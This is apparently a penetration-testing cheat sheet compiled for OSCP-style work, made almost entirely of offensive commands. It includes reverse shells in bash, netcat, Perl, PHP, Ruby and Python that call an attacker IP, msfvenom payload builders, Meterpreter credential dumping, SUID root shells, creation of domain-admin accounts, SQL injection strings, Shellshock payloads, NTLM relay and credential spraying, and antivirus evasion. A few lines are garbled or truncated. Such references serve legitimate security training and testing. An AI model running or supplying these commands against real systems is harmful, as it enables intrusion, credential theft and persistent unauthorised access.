In addition to my own contributions, this compilation is possible by other compiled cheatsheets by g0tmilk, highon.coffee, and pentestmonkey, as well as a few others listed at the bottom. It’s easiest to search via ctrl+F, as the Table of Contents isn’t kept up to date fully.
Pentesting Cheat Sheet
Table of Contents
Enumeration
Shells & Reverse Shells
Meterpreter
Windows reverse meterpreter payload
Windows VNC Meterpreter payload
Linux Reverse Meterpreter payload
Powershell
Privilege Escalation
Command Injection
Upload file using CURL to website with PUT option available
SQLInjections
Reverse shell using interpreters
Resources & Links
Cheat Sheets (Includes scripts)
Huge collection of common commands and scripts as well as general pentest info
Pentester Bookmarks, huge collection of blogs, forums, and resources
OSCP Writeups, blogs, and notes
Enumeration
General Enumeration:
-
nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
- Verbose, syn, all ports, all scripts, no ping
-
nmap -v -sS -A -T4 x.x.x.x
- Verbose, SYN Stealth, Version info, and scripts against services.
-
nmap –script smb-check-vulns.nse –script-args=unsafe=1 -p445 [host]
- Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
-
netdiscover -r 192.168.1.0/24
FTP Enumeration (21):
-
nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1
SSH (22):
-
ssh INSERTIPADDRESS 22
SMTP Enumeration (25):
-
nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
-
nc -nvv INSERTIPADDRESS 25
-
telnet INSERTIPADDRESS 25
Finger Enumeration (79):
Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-enumeration/finger-user-enum
Web Enumeration (80/443):
- dirbuster (GUI)
-
dirb http://10.0.0.1/
-
nikto –h 10.0.0.1
Pop3 (110):
-
telnet INSERTIPADDRESS 110
-
USER [username]
-
PASS [password]
- To login
-
LIST
- To list messages
-
RETR [message number]
- Retrieve message
-
QUIT
- quits
RPCBind (111):
-
rpcinfo –p x.x.x.x
SMB\RPC Enumeration (139/445):
-
enum4linux –a 10.0.0.1
nbtscan x.x.x.x
- Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
-
py 192.168.XXX.XXX 500 50000 dict.txt
-
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
-
nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse
-
smbclient -L //INSERTIPADDRESS/
- List open shares
-
smbclient //INSERTIPADDRESS/ipc$ -U john
SNMP Enumeration (161):
-
snmpwalk -c public -v1 10.0.0.0
-
snmpcheck -t 192.168.1.X -c public
-
onesixtyone -c names -i hosts
-
nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
-
snmpenum -t 192.168.1.X
Oracle (1521):
-
tnscmd10g version -h INSERTIPADDRESS
-
tnscmd10g status -h INSERTIPADDRESS
Mysql Enumeration (3306):
-
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
DNS Zone Transfers:
-
nslookup -> set type=any -> ls -d blah.com
-
dig axfr blah.com @ns1.blah.com
- This one works the best in my experience
-
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Mounting File Share
-
showmount -e IPADDR
-
mount 192.168.1.1:/vol/share /mnt/nfs -nolock
- mounts the share to /mnt/nfs without locking it
-
mount -t cifs -o username=user,password=pass,
domain=blah //192.168.1.X/share-name /mnt/cifs
- Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
-
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
- Mount a Windows share on Windows from the command line
-
apt-get install smb4k –y
- Install smb4k on Kali, useful Linux GUI for browsing SMB shares
Fingerprinting: Basic versioning / finger printing via displayed banner
-
nc -v 192.168.1.1 25
-
telnet 192.168.1.1 25
Exploit Research
-
searchsploit windows 2003 | grep -i local
- Search exploit-db for exploit, in this example windows 2003 + local esc
Compiling Exploits
-
gcc -o exploit exploit.c
- Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
-
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
- Compile windows .exe on Linux
Packet Inspection:
-
tcpdump tcp port 80 -w output.pcap -i eth0
- tcpdump for port 80 on interface eth0, outputs to output.pcap
Password Cracking
-
hash-identifier [hash]
-
john hashes.txt
-
hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt
-
hashcat -m 1000 dump.txt -o output.txt --remove -a 3 ?u?l?l?d?d?d?d
- Brute force crack for NTLM hashes with an uppercase, lowercase, lowercase, and 4 digit mask
- List of hash types and examples for hashcat https://hashcat.net/wiki/doku.php?id=example_hashes
- https://hashkiller.co.uk has a good repo of already cracked MD5 and NTLM hashes
Bruteforcing:
-
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin
-
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL
-
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V
- Hydra SMTP Brute force
Shells & Reverse Shells
SUID C Shells
- bin/bash:
int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }
- bin/sh:
int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }
TTY Shell:
-
python -c 'import pty;pty.spawn("/bin/bash")'
-
echo os.system('/bin/bash')
-
/bin/sh –i
-
execute('/bin/sh')
- LUA
-
!sh
- Privilege Escalation via nmap
-
:!bash
- Privilege escalation via vi
Fully Interactive TTY
In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
In Attacker console
stty -a
stty raw -echo
fg
In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
Spawn Ruby Shell
-
exec "/bin/sh"
-
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d
Netcat
-
nc -e /bin/sh ATTACKING-IP 80
-
/bin/sh | nc ATTACKING-IP 80
-
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
-
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
-
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
PHP
-
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
- (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)
Bash
-
exec /bin/bash 0&0 2>&0
-
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
-
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done
# or: while read line 0<&5; do $line 2>&5 >&5; done
-
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
Perl
-
exec "/bin/sh";
-
perl —e 'exec "/bin/sh";'
-
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
- Windows
-
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- Windows
Meterpreter
Windows reverse meterpreter payload
-
set payload windows/meterpreter/reverse_tcp
- Windows reverse tcp payload
Windows VNC Meterpreter payload
-
set payload windows/vncinject/reverse_tcp
- Meterpreter Windows VNC Payload
-
set ViewOnly false
Linux Reverse Meterpreter payload
-
set payload linux/meterpreter/reverse_tcp
- Meterpreter Linux Reverse Payload
Meterpreter Cheat Sheet
-
upload file c:\\windows
- Meterpreter upload file to Windows target
-
download c:\\windows\\repair\\sam /tmp
- Meterpreter download file from Windows target
-
download c:\\windows\\repair\\sam /tmp
- Meterpreter download file from Windows target
-
execute -f c:\\windows\temp\exploit.exe
- Meterpreter run .exe on target – handy for executing uploaded exploits
-
execute -f cmd -c
- Creates new channel with cmd shell
-
ps
- Meterpreter show processes
-
shell
- Meterpreter get shell on the target
-
getsystem
- Meterpreter attempts priviledge escalation the target
-
hashdump
- Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)
-
portfwd add –l 3389 –p 3389 –r target
- Meterpreter create port forward to target machine
-
portfwd delete –l 3389 –p 3389 –r target
- Meterpreter delete port forward
-
use exploit/windows/local/bypassuac
- Bypass UAC on Windows 7 + Set target + arch, x86/64
-
use auxiliary/scanner/http/dir_scanner
- Metasploit HTTP directory scanner
-
use auxiliary/scanner/http/jboss_vulnscan
- Metasploit JBOSS vulnerability scanner
-
use auxiliary/scanner/mssql/mssql_login
- Metasploit MSSQL Credential Scanner
-
use auxiliary/scanner/mysql/mysql_version
- Metasploit MSSQL Version Scanner
-
use auxiliary/scanner/oracle/oracle_login
- Metasploit Oracle Login Module
-
use exploit/multi/script/web_delivery
- Metasploit powershell payload delivery module
-
post/windows/manage/powershell/exec_powershell
- Metasploit upload and run powershell script through a session
-
use exploit/multi/http/jboss_maindeployer
- Metasploit JBOSS deploy
-
use exploit/windows/mssql/mssql_payload
- Metasploit MSSQL payload
-
run post/windows/gather/win_privs
- Metasploit show privileges of current user
-
use post/windows/gather/credentials/gpp
- Metasploit grab GPP saved passwords
-
load kiwi
-
creds_all
- Metasploit load Mimikatz/kiwi and get creds
-
run post/windows/gather/local_admin_search_enum
- Idenitfy other machines that the supplied domain user has administrative access to
-
set AUTORUNSCRIPT post/windows/manage/migrate
Meterpreter Payloads
-
msfvenom –l
- List options
Binaries
-
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
-
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
-
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
-
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php
- PHP
-
set payload php/meterpreter/reverse_tcp
- Listener
-
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
- PHP
-
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
- ASP
-
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
- JSP
-
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
- WAR
Scripting Payloads
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
- Python
-
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
- Bash
-
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
- Perl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
-
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
-
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
-
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
An example is:
msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension
Powershell
Execution Bypass
-
Set-ExecutionPolicy Unrestricted ./file.ps1
-
Import-Module script.psm1 Invoke-FunctionThatIsIntheModule
-
iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”)
Powershell.exe blocked
- Use ‘not powershell’ https://github.com/Ben0xA/nps
Persistence
-
net user username "password" /ADD
-
net group "Domain Admins" %username% /DOMAIN /ADD
Gather NTDS.dit file
-
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Privilege Escalation
Linux:
Find Binaries that will execute as the owner
-
find / -perm -u=s -type f 2>/dev/null
Find binaries that will execute as the group
-
find / -perm -g=s -type f 2>/dev/null
Find sticky-bit binaries
-
find / -perm -1000 -type d 2>/dev/null
If Python is executable as root
-
python2.7 -c "import pty;pty.spawn('/bin/sh');"
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/pentestmonkey/unix-privesc-check
Windows:
https://github.com/pentestmonkey/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Command Injection
File Traverse:
-
website.com/file.php[?path=/]
Test HTTP options using curl:
-
curl -vX OPTIONS [website]
Upload file using CURL to website with PUT option available
-
curl --upload-file shell.php --url http://192.168.218.139/test/shell.php --http1.0
Transfer file (Try temp directory if not writable)(wget -O tells it where to store):
-
?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;
Activate shell file:
-
; php -f filelocation.php;
SQLInjections
Common Injections for Login Forms:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
SQLMap
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
- Automated sqlmap scan
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
- Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend and use a random user agent + database dumpsqlmap -o -u "http://meh.com/form/" –forms
- sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users –dump
- sqlmap dump and crack hashes for table users on database-name.
sqlmap --flush session
- Flushes the session
sqlmap -p user --technique=B
- Attempts to exploit the “user” field using boolean technique.
sqlmap -r <captured request>
- Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add –os-shell at the end to pop a shell if possible.
Miscellaneous
NTLMRelayx.py using mitm6
This will take captured credentials via IPv6 spoofing using mitm6 and relay them to a target via ntlmrelayx.py. It requires ntlmrelayx.py and mitm6 to be installed already.
-
mitm6 -d <domain.local>
- First, start mitm6 and specify the domain you’re spoofing on with ‘-d domain.name’
-
ntlmrelayx.py -6 -wh 192.168.1.1 -t smb://192.168.1.2 -l ~/tmp/
- -6 specifies ipv6, -wh specifies where the WPAD file is hosted at (your IP usually). -t specifies the target, or destination where the credentials will be relayed. -l is to where to store the loot.
Name your terminal whatever you want
This small script will name your terminal whatever you pass as an argument to it. It helps organizing with multiple terminals open. Thanks Ben!
#!bin/bash echo -ne "\033]0;${1}\007"
sshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the need for proxy chains. What this command does is tunnels traffic through 10.0.0.1 and makes a route for all traffic destined for 10.10.10.0/24 through your sshuttle tunnel.
sshuttle -r root@10.0.0.1 10.10.10.0/24
-
wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe
- wine and hyperion need to be installed.
python -m SimpleHTTPServer 80
- Basic HTTP Server. Will list the directory it’s started in.
service apache2 start
- Starts Apache web server. Place files in /var/www/html to be able to ‘wget’ them.
Php Meterpreter Shell (Remove Guard bit)
msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R > phpmeterpreter.php
Netcat
- Listener:
nc -lvp <PORT>
- Listen verbosely on a port.
- Target:
nc -e /bin/bash listeneripaddress listenerport
- or
ncat -v -l -p 7777 -e /bin/bash
- Host:
cat happy.txt | ncat -v -l -p 5555
Target:ncat localhost 5555 > happy_copy.txt
- Download file via ncat
Reverse shell using interpreters (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
python -c python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Shellshock
curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 192.168.28.167:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
- Shellshock over SSH
CrackMapExec
-
crackmapexec
smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam- Spray the network with local login credentials then dump SAM contents
-
crackmapexec
smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --lsa- Pass the hash network-wide, local login, dump LSA contents
-
crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
- Requires Empire Restful API to be running. It will spray supply credentials and pop an empire agent on any successful login. Read more here
Resources & Links
Windows Privilege Escalation
http://www.fuzzysecurity.com/tutorials/16.html
https://toshellandback.com/2015/11/24/ms-priv-esc/
SQL & Apache Log paths
http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations
Recon
https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
Cheat Sheets (Includes scripts):
https://highon.coffee/blog/cheat-sheet/
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
Meterpreter Stuff
Proxy Chaining
apt-get install sshuttle
https://github.com/sshuttle/sshuttle
https://github.com/rofl0r/proxychains-ng
https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
Huge collection of common commands and scripts as well as general pentest info
https://bobloblaw.gitbooks.io/security/content/
Scripts
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
https://github.com/azmatt/windowsEnum
https://github.com/leebaird/discover
Pentester Bookmarks, huge collection of blogs, forums, and resources.
https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Pentest Checklist
http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf
Pentesting Workflow
https://workflowy.com/s/FgBl.6qcAQUUqWM
OSCP Writeups, blogs, and notes:
https://xapax.github.io/blog/2017/01/14/OSCP.html
http://www.securitysift.com/offsec-pwb-oscp/
https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms
https://blog.propriacausa.dewp-content/uploads/2016/07/oscp_notes.html
https://localhost.exposed/path-to-oscp/
https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/
https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html